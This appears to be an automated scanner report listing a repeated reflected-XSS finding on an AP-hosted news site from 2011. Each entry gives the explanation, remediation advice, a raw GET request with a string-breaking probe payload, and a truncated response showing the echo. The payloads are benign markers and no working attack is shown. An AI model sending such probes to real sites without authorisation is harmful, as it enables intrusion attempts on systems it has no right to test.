The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13c55'%3be4d98c85afd was submitted in the REST URL parameter 2. This input was echoed as 13c55';e4d98c85afd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409213c55'%3be4d98c85afd/Article_2011-01-30-Awards/id-85088ed0517649dd83e9f6521ccfc21a HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86391 Date: Mon, 31 Jan 2011 02:59:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 64230
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409213c55';e4d98c85afd/id-85088ed0517649dd83e9f6521ccfc21a'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22ecd'%3b53a8e306b85 was submitted in the REST URL parameter 2. This input was echoed as 22ecd';53a8e306b85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409222ecd'%3b53a8e306b85/Article_2011-01-30-Awards/id-ad7d216d56e342a58d2b1a78d81bee9f HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86396 Date: Tue, 01 Feb 2011 02:39:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69583
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409222ecd';53a8e306b85/id-ad7d216d56e342a58d2b1a78d81bee9f'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92c20'%3bc44140524e3 was submitted in the REST URL parameter 2. This input was echoed as 92c20';c44140524e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409292c20'%3bc44140524e3/Article_2011-01-30-Awards/id-d86371d349a441b499a59f24ed824b1e HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86378 Date: Tue, 01 Feb 2011 02:39:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 73616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409292c20';c44140524e3/id-d86371d349a441b499a59f24ed824b1e'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b733f'%3b0d43f6971bc was submitted in the REST URL parameter 2. This input was echoed as b733f';0d43f6971bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092b733f'%3b0d43f6971bc/Article_2011-01-30-Awards/id-d8e2444b6a1b49bf931c02b7841e3bfe HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 02:59:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71891
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092b733f';0d43f6971bc/id-d8e2444b6a1b49bf931c02b7841e3bfe'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 825f2'%3bad6fa172d70 was submitted in the REST URL parameter 2. This input was echoed as 825f2';ad6fa172d70 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092825f2'%3bad6fa172d70/Article_2011-01-30-Awards/id-e6b1e3e62d9346ad908c423b9a00059e HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86343 Date: Mon, 31 Jan 2011 02:59:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 63603
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092825f2';ad6fa172d70/id-e6b1e3e62d9346ad908c423b9a00059e'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f375f'%3b4490338fcd6 was submitted in the REST URL parameter 2. This input was echoed as f375f';4490338fcd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092f375f'%3b4490338fcd6/Article_2011-01-30-Awards/id-fa2b19a0c71443848f5742e8e2edaa3d HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86380 Date: Tue, 01 Feb 2011 02:40:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69870
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092f375f';4490338fcd6/id-fa2b19a0c71443848f5742e8e2edaa3d'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670fe'%3b2fa73d0aaf was submitted in the REST URL parameter 2. This input was echoed as 670fe';2fa73d0aaf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092670fe'%3b2fa73d0aaf/Article_2011-01-30-Awards/id-fb271b398f7841a0a0f7a38010e600b1 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86394 Date: Mon, 31 Jan 2011 02:59:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092670fe';2fa73d0aaf/id-fb271b398f7841a0a0f7a38010e600b1'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48bec'%3b51380a848c8 was submitted in the REST URL parameter 2. This input was echoed as 48bec';51380a848c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409248bec'%3b51380a848c8/Article_2011-01-30-Berenstain%20Bears/id-68470f05edac4fefba924215b119ee15 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 18:32:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 70970
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409248bec';51380a848c8/id-68470f05edac4fefba924215b119ee15'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d40f'%3b9da42588d2d was submitted in the REST URL parameter 2. This input was echoed as 7d40f';9da42588d2d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940927d40f'%3b9da42588d2d/Article_2011-01-30-Box%20Office/id-1278f09f460848fbbcc62b91871cd817 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 00:54:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 65760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940927d40f';9da42588d2d/id-1278f09f460848fbbcc62b91871cd817'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9945e'%3b257b5cb0a79 was submitted in the REST URL parameter 2. This input was echoed as 9945e';257b5cb0a79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940929945e'%3b257b5cb0a79/Article_2011-01-30-Box%20Office/id-154975e2b5cc494fb312dbc3647defab HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 00:54:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 65760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940929945e';257b5cb0a79/id-154975e2b5cc494fb312dbc3647defab'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d71ce'%3b5e19effc91f was submitted in the REST URL parameter 2. This input was echoed as d71ce';5e19effc91f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092d71ce'%3b5e19effc91f/Article_2011-01-30-Box%20Office/id-48985ed6e51c4480a9db3287c640b521 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86346 Date: Sun, 30 Jan 2011 18:32:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 58138
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092d71ce';5e19effc91f/id-48985ed6e51c4480a9db3287c640b521'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8974f'%3b23d27581a99 was submitted in the REST URL parameter 2. This input was echoed as 8974f';23d27581a99 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940928974f'%3b23d27581a99/Article_2011-01-30-Box%20Office/id-a17279ed203046bba76de65c23a451e7 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86352 Date: Tue, 01 Feb 2011 02:39:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 65788
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940928974f';23d27581a99/id-a17279ed203046bba76de65c23a451e7'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d681e'%3b72d2cb1b31 was submitted in the REST URL parameter 2. This input was echoed as d681e';72d2cb1b31 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092d681e'%3b72d2cb1b31/Article_2011-01-30-Box%20Office/id-ad4f700bbdc14747b141b1ec2de77981 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 00:54:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 65246
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092d681e';72d2cb1b31/id-ad4f700bbdc14747b141b1ec2de77981'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea6eb'%3bd4b53f1ce0e was submitted in the REST URL parameter 2. This input was echoed as ea6eb';d4b53f1ce0e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092ea6eb'%3bd4b53f1ce0e/Article_2011-01-30-Directors%20Awards/id-0514e93f138842e386162886ad51f974 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86389 Date: Sun, 30 Jan 2011 18:32:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71346
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092ea6eb';d4b53f1ce0e/id-0514e93f138842e386162886ad51f974'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c41d'%3b2ce0b322dc3 was submitted in the REST URL parameter 2. This input was echoed as 5c41d';2ce0b322dc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940925c41d'%3b2ce0b322dc3/Article_2011-01-30-Film%20Superman%20Casting/id-9a622d28c6a14ed883019e21ad29c704 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 00:55:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57371
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940925c41d';2ce0b322dc3/id-9a622d28c6a14ed883019e21ad29c704'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fcab'%3b4f3ddbec193 was submitted in the REST URL parameter 2. This input was echoed as 4fcab';4f3ddbec193 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940924fcab'%3b4f3ddbec193/Article_2011-01-30-Indonesia%20Sex%20Video%20Trial/id-213e6b7bd15d4ef5bc30feb6708734d8 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86367 Date: Tue, 01 Feb 2011 02:39:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 59266
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
